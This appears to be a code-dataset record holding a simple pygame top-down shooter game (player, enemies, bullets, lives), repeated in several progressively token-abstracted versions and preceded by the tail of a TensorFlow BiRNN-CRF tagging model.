'bidirectional_rnn_word_%d' % n)\n word_embedded = tf.concat((out_fw, out_bw), 2)\n logits = tf.layers.Dense(word_embedded, len(idx2tag))\n y_t = self.labels\n log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(\n logits, y_t, self.lengths)\n self.cost = tf.reduce_mean(-log_likelihood)\n self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate\n ).minimize(self.cost)\n mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)\n self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,\n transition_params, self.lengths)\n self.tags_seq = tf.identity(self.tags_seq, name='logits')\n y_t = tf.cast(y_t, tf.int32)\n self.prediction = tf.boolean_mask(self.tags_seq, mask)\n mask_label = tf.boolean_mask(y_t, mask)\n correct_pred = tf.equal(self.prediction, mask_label)\n correct_index = tf.cast(correct_pred, tf.float32)\n self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n", "<docstring token>\n<import token>\n\n\nclass Model:\n <function token>\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n", "<docstring token>\n<import token>\n<class token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n" ]
false
11
54e04d740ef46fca04cf4169d2e7c05083414bd8
import random import math import time import pygame pygame.init() scr = pygame.display.set_mode((700,700)) enemies = [] #music = pygame.mixer.music.load('ENERGETIC CHIPTUNE Thermal - Evan King.mp3') #pygame.mixer.music.play(-1) hit = [] class Player: def __init__(self): self.x = 275 self.y = 275 self.image = pygame.image.load('player.jpg') self.image1 = pygame.image.load('hearts.png') self.lives = 5 def draw(self): scr.blit(self.image,(self.x,self.y)) def rotate(self, x, y): oppos = math.fabs(y - self.y) adjac = math.fabs(x - self.x) hypot = math.hypot(oppos,adjac) sin = oppos/hypot radians = math.asin(sin) angle = radians * (180/3.14) if x > self.x: if y > self.y: angle -= angle + angle if x < self.x: angle = 180 + (angle - (angle + angle)) if y > self.y: angle -= angle + angle return angle - 90 class Bullet: def __init__(self, color): self.x = 0 self.y = 0 self.angle = 0 self.color = color def draw(self): pygame.draw.rect(scr,self.color,pygame.Rect(self.x,self.y,5,5)) class Gun: def __init__(self): self.x = 0 self.y = 0 self.bullets = [] self.bullets2 = [] def shoot1(self,x,y,angle): self.bullets.append(Bullet((0,255,255))) self.bullets[-1].x = x self.bullets[-1].y = y self.bullets[-1].angle = angle def shoot2(self,x,y,angle): self.bullets2.append(Bullet((255,255,0))) self.bullets2[-1].x = x self.bullets2[-1].y = y self.bullets2[-1].angle = angle class Enemy: def __init__(self): self.x = 100 self.y = 100 self.speed = 2 self.hearts = 3 self.image = pygame.image.load('enemy.png') def draw(self): scr.blit(self.image,(self.x,self.y)) def rotate(self, x, y): oppos = math.fabs(y - self.y) adjac = math.fabs(x - self.x) hypot = math.hypot(oppos,adjac) sin = oppos/hypot radians = math.asin(sin) angle = radians * (180/3.14) if x > self.x: if y > self.y: angle -= angle + angle if x < self.x: angle = 180 + (angle - (angle + angle)) if y > self.y: angle -= angle + angle return angle - 90 def distance(self,x,y): oppos = math.fabs(y - self.y) adjac = math.fabs(x - self.x) hypot = math.hypot(oppos,adjac) return hypot def spawn(self): enemies.append(Enemy()) enemies[-1].x = random.randint(0,600) enemies[-1].y = random.randint(0,600) cmd = Enemy() gun = Gun() player = Player() cmd.spawn() cmd.spawn() last = 0 frames = 0 fro = 1 while True: frames += 1 scr.fill((0,0,0)) for event in pygame.event.get(): key = pygame.key.get_pressed() Mpos = pygame.mouse.get_pos() if event.type == 5: gun.shoot1(player.x + 12.5,player.y + 12.5,angle) for i in range(0,player.lives): scr.blit(player.image1,(i*35,1)) for i in range(len(gun.bullets)): try: gun.bullets[i].x = gun.bullets[i].x + 4 * math.cos(math.radians(gun.bullets[i].angle + 90)) gun.bullets[i].y = gun.bullets[i].y + 4 * math.sin(math.radians(gun.bullets[i].angle - 90)) if gun.bullets[i].x > 600: del gun.bullets[i] if gun.bullets[i].x < 0: del gun.bullets[i] if gun.bullets[i].y > 600: del gun.bullets[i] if gun.bullets[i].y < 0: del gun.bullets[i] gun.bullets[i].draw() except IndexError: pass for i in range(len(gun.bullets2)): try: gun.bullets2[i].x = gun.bullets2[i].x + 4 * math.cos(math.radians(gun.bullets2[i].angle + 90)) gun.bullets2[i].y = gun.bullets2[i].y + 4 * math.sin(math.radians(gun.bullets2[i].angle - 90)) if gun.bullets2[i].x > 600: del gun.bullets2[i] if gun.bullets2[i].x < 0: del gun.bullets2[i] if gun.bullets2[i].y > 600: del gun.bullets2[i] if gun.bullets2[i].y < 0: del gun.bullets2[i] gun.bullets2[i].draw() except IndexError: pass for i in range(len(enemies)): if enemies[i].distance(player.x,player.y) > 100: enemies[i].x = enemies[i].x + enemies[i].speed * math.cos(math.radians(enemies[i].rotate(player.x,player.y) + 90)) enemies[i].y = enemies[i].y + enemies[i].speed * math.sin(math.radians(enemies[i].rotate(player.x,player.y) - 90)) enemies[i].image = pygame.image.load("enemy.png").convert() enemies[i].image = enemies[i].image.copy() enemies[i].image = pygame.transform.rotate(enemies[i].image,enemies[i].rotate(player.x,player.y)) angle2 = enemies[i].rotate(player.x,player.y) if frames % 100 == 0: gun.shoot2(enemies[i].x + 12.5,enemies[i].y + 12.5,angle2) enemies[i].draw() for j in range(len(gun.bullets)): for i in range(len(gun.bullets)): try: if gun.bullets[j].x > enemies[i].x and gun.bullets[j].x < enemies[i].x+25 and gun.bullets[j].y > enemies[i].y and gun.bullets[j].y < enemies[i].y + 25: del enemies[i] except IndexError: pass for j in range(len(gun.bullets2)): for i in range(len(gun.bullets2)): try: if gun.bullets2[j].x > player.x and gun.bullets2[j].x < player.x+25 and gun.bullets2[j].y > player.y and gun.bullets2[j].y < player.y + 25: for i in range(len(hit)-1): if not (hit[i].x > player.x or hit[i].x < player.x+25 or hit[i].y > player.y or hit[i].y < player.y): del hit[i] if hit.count(gun.bullets2[j]) == 0: hit.append(gun.bullets2[j]) player.lives = 5 - len(hit) except IndexError: pass if key[pygame.K_a]: player.x -= 3 if key[pygame.K_d]: player.x += 3 if key[pygame.K_w]: player.y -= 3 if key[pygame.K_s]: player.y += 3 if frames % 150 == 0: cmd.spawn() if player.lives < 1: pygame.quit() break player.image = pygame.image.load("player.jpg").convert() player.image = player.image.copy() player.image = pygame.transform.rotate(player.image,player.rotate(Mpos[0],Mpos[1])) angle = player.rotate(Mpos[0],Mpos[1]) player.draw() pygame.display.update() time.sleep(0.005) quit()
[ "import random\r\nimport math\r\nimport time\r\nimport pygame\r\npygame.init()\r\nscr = pygame.display.set_mode((700,700))\r\nenemies = []\r\n#music = pygame.mixer.music.load('ENERGETIC CHIPTUNE Thermal - Evan King.mp3')\r\n#pygame.mixer.music.play(-1)\r\nhit = []\r\nclass Player:\r\n def __init__(self):\r\n self.x = 275\r\n self.y = 275\r\n self.image = pygame.image.load('player.jpg')\r\n self.image1 = pygame.image.load('hearts.png')\r\n self.lives = 5\r\n def draw(self):\r\n scr.blit(self.image,(self.x,self.y))\r\n def rotate(self, x, y):\r\n oppos = math.fabs(y - self.y)\r\n adjac = math.fabs(x - self.x)\r\n hypot = math.hypot(oppos,adjac)\r\n sin = oppos/hypot\r\n radians = math.asin(sin)\r\n angle = radians * (180/3.14)\r\n if x > self.x: \r\n if y > self.y:\r\n angle -= angle + angle\r\n if x < self.x:\r\n angle = 180 + (angle - (angle + angle))\r\n if y > self.y:\r\n angle -= angle + angle\r\n return angle - 90\r\nclass Bullet:\r\n def __init__(self, color):\r\n self.x = 0\r\n self.y = 0\r\n self.angle = 0\r\n self.color = color\r\n def draw(self):\r\n pygame.draw.rect(scr,self.color,pygame.Rect(self.x,self.y,5,5))\r\nclass Gun:\r\n def __init__(self):\r\n self.x = 0\r\n self.y = 0\r\n self.bullets = []\r\n self.bullets2 = []\r\n def shoot1(self,x,y,angle):\r\n self.bullets.append(Bullet((0,255,255)))\r\n self.bullets[-1].x = x\r\n self.bullets[-1].y = y\r\n self.bullets[-1].angle = angle\r\n def shoot2(self,x,y,angle):\r\n self.bullets2.append(Bullet((255,255,0)))\r\n self.bullets2[-1].x = x\r\n self.bullets2[-1].y = y\r\n self.bullets2[-1].angle = angle\r\nclass Enemy:\r\n def __init__(self):\r\n self.x = 100\r\n self.y = 100\r\n self.speed = 2\r\n self.hearts = 3\r\n self.image = pygame.image.load('enemy.png')\r\n def draw(self):\r\n scr.blit(self.image,(self.x,self.y))\r\n def rotate(self, x, y):\r\n oppos = math.fabs(y - self.y)\r\n adjac = math.fabs(x - self.x)\r\n hypot = math.hypot(oppos,adjac)\r\n sin = oppos/hypot\r\n radians = math.asin(sin)\r\n angle = radians * (180/3.14)\r\n if x > self.x: \r\n if y > self.y:\r\n angle -= angle + angle\r\n if x < self.x:\r\n angle = 180 + (angle - (angle + angle))\r\n if y > self.y:\r\n angle -= angle + angle\r\n return angle - 90\r\n def distance(self,x,y):\r\n oppos = math.fabs(y - self.y)\r\n adjac = math.fabs(x - self.x)\r\n hypot = math.hypot(oppos,adjac)\r\n return hypot\r\n def spawn(self):\r\n enemies.append(Enemy())\r\n enemies[-1].x = random.randint(0,600)\r\n enemies[-1].y = random.randint(0,600)\r\ncmd = Enemy()\r\ngun = Gun() \r\nplayer = Player()\r\ncmd.spawn()\r\ncmd.spawn()\r\nlast = 0\r\nframes = 0\r\nfro = 1\r\nwhile True:\r\n frames += 1\r\n scr.fill((0,0,0))\r\n for event in pygame.event.get():\r\n key = pygame.key.get_pressed()\r\n Mpos = pygame.mouse.get_pos()\r\n if event.type == 5:\r\n gun.shoot1(player.x + 12.5,player.y + 12.5,angle)\r\n for i in range(0,player.lives):\r\n scr.blit(player.image1,(i*35,1))\r\n \r\n for i in range(len(gun.bullets)):\r\n try:\r\n gun.bullets[i].x = gun.bullets[i].x + 4 * math.cos(math.radians(gun.bullets[i].angle + 90))\r\n gun.bullets[i].y = gun.bullets[i].y + 4 * math.sin(math.radians(gun.bullets[i].angle - 90))\r\n if gun.bullets[i].x > 600:\r\n del gun.bullets[i]\r\n if gun.bullets[i].x < 0:\r\n del gun.bullets[i]\r\n if gun.bullets[i].y > 600:\r\n del gun.bullets[i]\r\n if gun.bullets[i].y < 0:\r\n del gun.bullets[i]\r\n gun.bullets[i].draw()\r\n except IndexError:\r\n pass\r\n for i in range(len(gun.bullets2)):\r\n try:\r\n gun.bullets2[i].x = gun.bullets2[i].x + 4 * math.cos(math.radians(gun.bullets2[i].angle + 90))\r\n gun.bullets2[i].y = gun.bullets2[i].y + 4 * math.sin(math.radians(gun.bullets2[i].angle - 90))\r\n if gun.bullets2[i].x > 600:\r\n del gun.bullets2[i]\r\n if gun.bullets2[i].x < 0:\r\n del gun.bullets2[i]\r\n if gun.bullets2[i].y > 600:\r\n del gun.bullets2[i]\r\n if gun.bullets2[i].y < 0:\r\n del gun.bullets2[i]\r\n gun.bullets2[i].draw()\r\n except IndexError:\r\n pass\r\n for i in range(len(enemies)):\r\n if enemies[i].distance(player.x,player.y) > 100:\r\n enemies[i].x = enemies[i].x + enemies[i].speed * math.cos(math.radians(enemies[i].rotate(player.x,player.y) + 90))\r\n enemies[i].y = enemies[i].y + enemies[i].speed * math.sin(math.radians(enemies[i].rotate(player.x,player.y) - 90))\r\n enemies[i].image = pygame.image.load(\"enemy.png\").convert()\r\n enemies[i].image = enemies[i].image.copy()\r\n enemies[i].image = pygame.transform.rotate(enemies[i].image,enemies[i].rotate(player.x,player.y))\r\n angle2 = enemies[i].rotate(player.x,player.y)\r\n if frames % 100 == 0:\r\n gun.shoot2(enemies[i].x + 12.5,enemies[i].y + 12.5,angle2)\r\n enemies[i].draw()\r\n for j in range(len(gun.bullets)):\r\n for i in range(len(gun.bullets)):\r\n try:\r\n if gun.bullets[j].x > enemies[i].x and gun.bullets[j].x < enemies[i].x+25 and gun.bullets[j].y > enemies[i].y and gun.bullets[j].y < enemies[i].y + 25:\r\n del enemies[i]\r\n except IndexError:\r\n pass\r\n for j in range(len(gun.bullets2)):\r\n for i in range(len(gun.bullets2)):\r\n try:\r\n if gun.bullets2[j].x > player.x and gun.bullets2[j].x < player.x+25 and gun.bullets2[j].y > player.y and gun.bullets2[j].y < player.y + 25:\r\n for i in range(len(hit)-1):\r\n if not (hit[i].x > player.x or hit[i].x < player.x+25 or hit[i].y > player.y or hit[i].y < player.y):\r\n del hit[i]\r\n if hit.count(gun.bullets2[j]) == 0:\r\n hit.append(gun.bullets2[j])\r\n player.lives = 5 - len(hit)\r\n except IndexError:\r\n pass\r\n if key[pygame.K_a]:\r\n player.x -= 3\r\n if key[pygame.K_d]:\r\n player.x += 3\r\n if key[pygame.K_w]:\r\n player.y -= 3\r\n if key[pygame.K_s]:\r\n player.y += 3\r\n if frames % 150 == 0:\r\n cmd.spawn()\r\n if player.lives < 1:\r\n pygame.quit()\r\n break\r\n player.image = pygame.image.load(\"player.jpg\").convert()\r\n player.image = player.image.copy()\r\n player.image = pygame.transform.rotate(player.image,player.rotate(Mpos[0],Mpos[1]))\r\n angle = player.rotate(Mpos[0],Mpos[1])\r\n player.draw()\r\n pygame.display.update()\r\n time.sleep(0.005)\r\nquit()\r\n\r\n", "import random\nimport math\nimport time\nimport pygame\npygame.init()\nscr = pygame.display.set_mode((700, 700))\nenemies = []\nhit = []\n\n\nclass Player:\n\n def __init__(self):\n self.x = 275\n self.y = 275\n self.image = pygame.image.load('player.jpg')\n self.image1 = pygame.image.load('hearts.png')\n self.lives = 5\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n\nclass Bullet:\n\n def __init__(self, color):\n self.x = 0\n self.y = 0\n self.angle = 0\n self.color = color\n\n def draw(self):\n pygame.draw.rect(scr, self.color, pygame.Rect(self.x, self.y, 5, 5))\n\n\nclass Gun:\n\n def __init__(self):\n self.x = 0\n self.y = 0\n self.bullets = []\n self.bullets2 = []\n\n def shoot1(self, x, y, angle):\n self.bullets.append(Bullet((0, 255, 255)))\n self.bullets[-1].x = x\n self.bullets[-1].y = y\n self.bullets[-1].angle = angle\n\n def shoot2(self, x, y, angle):\n self.bullets2.append(Bullet((255, 255, 0)))\n self.bullets2[-1].x = x\n self.bullets2[-1].y = y\n self.bullets2[-1].angle = angle\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\ncmd = Enemy()\ngun = Gun()\nplayer = Player()\ncmd.spawn()\ncmd.spawn()\nlast = 0\nframes = 0\nfro = 1\nwhile True:\n frames += 1\n scr.fill((0, 0, 0))\n for event in pygame.event.get():\n key = pygame.key.get_pressed()\n Mpos = pygame.mouse.get_pos()\n if event.type == 5:\n gun.shoot1(player.x + 12.5, player.y + 12.5, angle)\n for i in range(0, player.lives):\n scr.blit(player.image1, (i * 35, 1))\n for i in range(len(gun.bullets)):\n try:\n gun.bullets[i].x = gun.bullets[i].x + 4 * math.cos(math.radians\n (gun.bullets[i].angle + 90))\n gun.bullets[i].y = gun.bullets[i].y + 4 * math.sin(math.radians\n (gun.bullets[i].angle - 90))\n if gun.bullets[i].x > 600:\n del gun.bullets[i]\n if gun.bullets[i].x < 0:\n del gun.bullets[i]\n if gun.bullets[i].y > 600:\n del gun.bullets[i]\n if gun.bullets[i].y < 0:\n del gun.bullets[i]\n gun.bullets[i].draw()\n except IndexError:\n pass\n for i in range(len(gun.bullets2)):\n try:\n gun.bullets2[i].x = gun.bullets2[i].x + 4 * math.cos(math.\n radians(gun.bullets2[i].angle + 90))\n gun.bullets2[i].y = gun.bullets2[i].y + 4 * math.sin(math.\n radians(gun.bullets2[i].angle - 90))\n if gun.bullets2[i].x > 600:\n del gun.bullets2[i]\n if gun.bullets2[i].x < 0:\n del gun.bullets2[i]\n if gun.bullets2[i].y > 600:\n del gun.bullets2[i]\n if gun.bullets2[i].y < 0:\n del gun.bullets2[i]\n gun.bullets2[i].draw()\n except IndexError:\n pass\n for i in range(len(enemies)):\n if enemies[i].distance(player.x, player.y) > 100:\n enemies[i].x = enemies[i].x + enemies[i].speed * math.cos(math.\n radians(enemies[i].rotate(player.x, player.y) + 90))\n enemies[i].y = enemies[i].y + enemies[i].speed * math.sin(math.\n radians(enemies[i].rotate(player.x, player.y) - 90))\n enemies[i].image = pygame.image.load('enemy.png').convert()\n enemies[i].image = enemies[i].image.copy()\n enemies[i].image = pygame.transform.rotate(enemies[i].image,\n enemies[i].rotate(player.x, player.y))\n angle2 = enemies[i].rotate(player.x, player.y)\n if frames % 100 == 0:\n gun.shoot2(enemies[i].x + 12.5, enemies[i].y + 12.5, angle2)\n enemies[i].draw()\n for j in range(len(gun.bullets)):\n for i in range(len(gun.bullets)):\n try:\n if gun.bullets[j].x > enemies[i].x and gun.bullets[j\n ].x < enemies[i].x + 25 and gun.bullets[j].y > enemies[i\n ].y and gun.bullets[j].y < enemies[i].y + 25:\n del enemies[i]\n except IndexError:\n pass\n for j in range(len(gun.bullets2)):\n for i in range(len(gun.bullets2)):\n try:\n if gun.bullets2[j].x > player.x and gun.bullets2[j\n ].x < player.x + 25 and gun.bullets2[j\n ].y > player.y and gun.bullets2[j].y < player.y + 25:\n for i in range(len(hit) - 1):\n if not (hit[i].x > player.x or hit[i].x < player.x +\n 25 or hit[i].y > player.y or hit[i].y < player.y):\n del hit[i]\n if hit.count(gun.bullets2[j]) == 0:\n hit.append(gun.bullets2[j])\n player.lives = 5 - len(hit)\n except IndexError:\n pass\n if key[pygame.K_a]:\n player.x -= 3\n if key[pygame.K_d]:\n player.x += 3\n if key[pygame.K_w]:\n player.y -= 3\n if key[pygame.K_s]:\n player.y += 3\n if frames % 150 == 0:\n cmd.spawn()\n if player.lives < 1:\n pygame.quit()\n break\n player.image = pygame.image.load('player.jpg').convert()\n player.image = player.image.copy()\n player.image = pygame.transform.rotate(player.image, player.rotate(Mpos\n [0], Mpos[1]))\n angle = player.rotate(Mpos[0], Mpos[1])\n player.draw()\n pygame.display.update()\n time.sleep(0.005)\nquit()\n", "<import token>\npygame.init()\nscr = pygame.display.set_mode((700, 700))\nenemies = []\nhit = []\n\n\nclass Player:\n\n def __init__(self):\n self.x = 275\n self.y = 275\n self.image = pygame.image.load('player.jpg')\n self.image1 = pygame.image.load('hearts.png')\n self.lives = 5\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n\nclass Bullet:\n\n def __init__(self, color):\n self.x = 0\n self.y = 0\n self.angle = 0\n self.color = color\n\n def draw(self):\n pygame.draw.rect(scr, self.color, pygame.Rect(self.x, self.y, 5, 5))\n\n\nclass Gun:\n\n def __init__(self):\n self.x = 0\n self.y = 0\n self.bullets = []\n self.bullets2 = []\n\n def shoot1(self, x, y, angle):\n self.bullets.append(Bullet((0, 255, 255)))\n self.bullets[-1].x = x\n self.bullets[-1].y = y\n self.bullets[-1].angle = angle\n\n def shoot2(self, x, y, angle):\n self.bullets2.append(Bullet((255, 255, 0)))\n self.bullets2[-1].x = x\n self.bullets2[-1].y = y\n self.bullets2[-1].angle = angle\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\ncmd = Enemy()\ngun = Gun()\nplayer = Player()\ncmd.spawn()\ncmd.spawn()\nlast = 0\nframes = 0\nfro = 1\nwhile True:\n frames += 1\n scr.fill((0, 0, 0))\n for event in pygame.event.get():\n key = pygame.key.get_pressed()\n Mpos = pygame.mouse.get_pos()\n if event.type == 5:\n gun.shoot1(player.x + 12.5, player.y + 12.5, angle)\n for i in range(0, player.lives):\n scr.blit(player.image1, (i * 35, 1))\n for i in range(len(gun.bullets)):\n try:\n gun.bullets[i].x = gun.bullets[i].x + 4 * math.cos(math.radians\n (gun.bullets[i].angle + 90))\n gun.bullets[i].y = gun.bullets[i].y + 4 * math.sin(math.radians\n (gun.bullets[i].angle - 90))\n if gun.bullets[i].x > 600:\n del gun.bullets[i]\n if gun.bullets[i].x < 0:\n del gun.bullets[i]\n if gun.bullets[i].y > 600:\n del gun.bullets[i]\n if gun.bullets[i].y < 0:\n del gun.bullets[i]\n gun.bullets[i].draw()\n except IndexError:\n pass\n for i in range(len(gun.bullets2)):\n try:\n gun.bullets2[i].x = gun.bullets2[i].x + 4 * math.cos(math.\n radians(gun.bullets2[i].angle + 90))\n gun.bullets2[i].y = gun.bullets2[i].y + 4 * math.sin(math.\n radians(gun.bullets2[i].angle - 90))\n if gun.bullets2[i].x > 600:\n del gun.bullets2[i]\n if gun.bullets2[i].x < 0:\n del gun.bullets2[i]\n if gun.bullets2[i].y > 600:\n del gun.bullets2[i]\n if gun.bullets2[i].y < 0:\n del gun.bullets2[i]\n gun.bullets2[i].draw()\n except IndexError:\n pass\n for i in range(len(enemies)):\n if enemies[i].distance(player.x, player.y) > 100:\n enemies[i].x = enemies[i].x + enemies[i].speed * math.cos(math.\n radians(enemies[i].rotate(player.x, player.y) + 90))\n enemies[i].y = enemies[i].y + enemies[i].speed * math.sin(math.\n radians(enemies[i].rotate(player.x, player.y) - 90))\n enemies[i].image = pygame.image.load('enemy.png').convert()\n enemies[i].image = enemies[i].image.copy()\n enemies[i].image = pygame.transform.rotate(enemies[i].image,\n enemies[i].rotate(player.x, player.y))\n angle2 = enemies[i].rotate(player.x, player.y)\n if frames % 100 == 0:\n gun.shoot2(enemies[i].x + 12.5, enemies[i].y + 12.5, angle2)\n enemies[i].draw()\n for j in range(len(gun.bullets)):\n for i in range(len(gun.bullets)):\n try:\n if gun.bullets[j].x > enemies[i].x and gun.bullets[j\n ].x < enemies[i].x + 25 and gun.bullets[j].y > enemies[i\n ].y and gun.bullets[j].y < enemies[i].y + 25:\n del enemies[i]\n except IndexError:\n pass\n for j in range(len(gun.bullets2)):\n for i in range(len(gun.bullets2)):\n try:\n if gun.bullets2[j].x > player.x and gun.bullets2[j\n ].x < player.x + 25 and gun.bullets2[j\n ].y > player.y and gun.bullets2[j].y < player.y + 25:\n for i in range(len(hit) - 1):\n if not (hit[i].x > player.x or hit[i].x < player.x +\n 25 or hit[i].y > player.y or hit[i].y < player.y):\n del hit[i]\n if hit.count(gun.bullets2[j]) == 0:\n hit.append(gun.bullets2[j])\n player.lives = 5 - len(hit)\n except IndexError:\n pass\n if key[pygame.K_a]:\n player.x -= 3\n if key[pygame.K_d]:\n player.x += 3\n if key[pygame.K_w]:\n player.y -= 3\n if key[pygame.K_s]:\n player.y += 3\n if frames % 150 == 0:\n cmd.spawn()\n if player.lives < 1:\n pygame.quit()\n break\n player.image = pygame.image.load('player.jpg').convert()\n player.image = player.image.copy()\n player.image = pygame.transform.rotate(player.image, player.rotate(Mpos\n [0], Mpos[1]))\n angle = player.rotate(Mpos[0], Mpos[1])\n player.draw()\n pygame.display.update()\n time.sleep(0.005)\nquit()\n", "<import token>\npygame.init()\n<assignment token>\n\n\nclass Player:\n\n def __init__(self):\n self.x = 275\n self.y = 275\n self.image = pygame.image.load('player.jpg')\n self.image1 = pygame.image.load('hearts.png')\n self.lives = 5\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n\nclass Bullet:\n\n def __init__(self, color):\n self.x = 0\n self.y = 0\n self.angle = 0\n self.color = color\n\n def draw(self):\n pygame.draw.rect(scr, self.color, pygame.Rect(self.x, self.y, 5, 5))\n\n\nclass Gun:\n\n def __init__(self):\n self.x = 0\n self.y = 0\n self.bullets = []\n self.bullets2 = []\n\n def shoot1(self, x, y, angle):\n self.bullets.append(Bullet((0, 255, 255)))\n self.bullets[-1].x = x\n self.bullets[-1].y = y\n self.bullets[-1].angle = angle\n\n def shoot2(self, x, y, angle):\n self.bullets2.append(Bullet((255, 255, 0)))\n self.bullets2[-1].x = x\n self.bullets2[-1].y = y\n self.bullets2[-1].angle = angle\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\n<assignment token>\ncmd.spawn()\ncmd.spawn()\n<assignment token>\nwhile True:\n frames += 1\n scr.fill((0, 0, 0))\n for event in pygame.event.get():\n key = pygame.key.get_pressed()\n Mpos = pygame.mouse.get_pos()\n if event.type == 5:\n gun.shoot1(player.x + 12.5, player.y + 12.5, angle)\n for i in range(0, player.lives):\n scr.blit(player.image1, (i * 35, 1))\n for i in range(len(gun.bullets)):\n try:\n gun.bullets[i].x = gun.bullets[i].x + 4 * math.cos(math.radians\n (gun.bullets[i].angle + 90))\n gun.bullets[i].y = gun.bullets[i].y + 4 * math.sin(math.radians\n (gun.bullets[i].angle - 90))\n if gun.bullets[i].x > 600:\n del gun.bullets[i]\n if gun.bullets[i].x < 0:\n del gun.bullets[i]\n if gun.bullets[i].y > 600:\n del gun.bullets[i]\n if gun.bullets[i].y < 0:\n del gun.bullets[i]\n gun.bullets[i].draw()\n except IndexError:\n pass\n for i in range(len(gun.bullets2)):\n try:\n gun.bullets2[i].x = gun.bullets2[i].x + 4 * math.cos(math.\n radians(gun.bullets2[i].angle + 90))\n gun.bullets2[i].y = gun.bullets2[i].y + 4 * math.sin(math.\n radians(gun.bullets2[i].angle - 90))\n if gun.bullets2[i].x > 600:\n del gun.bullets2[i]\n if gun.bullets2[i].x < 0:\n del gun.bullets2[i]\n if gun.bullets2[i].y > 600:\n del gun.bullets2[i]\n if gun.bullets2[i].y < 0:\n del gun.bullets2[i]\n gun.bullets2[i].draw()\n except IndexError:\n pass\n for i in range(len(enemies)):\n if enemies[i].distance(player.x, player.y) > 100:\n enemies[i].x = enemies[i].x + enemies[i].speed * math.cos(math.\n radians(enemies[i].rotate(player.x, player.y) + 90))\n enemies[i].y = enemies[i].y + enemies[i].speed * math.sin(math.\n radians(enemies[i].rotate(player.x, player.y) - 90))\n enemies[i].image = pygame.image.load('enemy.png').convert()\n enemies[i].image = enemies[i].image.copy()\n enemies[i].image = pygame.transform.rotate(enemies[i].image,\n enemies[i].rotate(player.x, player.y))\n angle2 = enemies[i].rotate(player.x, player.y)\n if frames % 100 == 0:\n gun.shoot2(enemies[i].x + 12.5, enemies[i].y + 12.5, angle2)\n enemies[i].draw()\n for j in 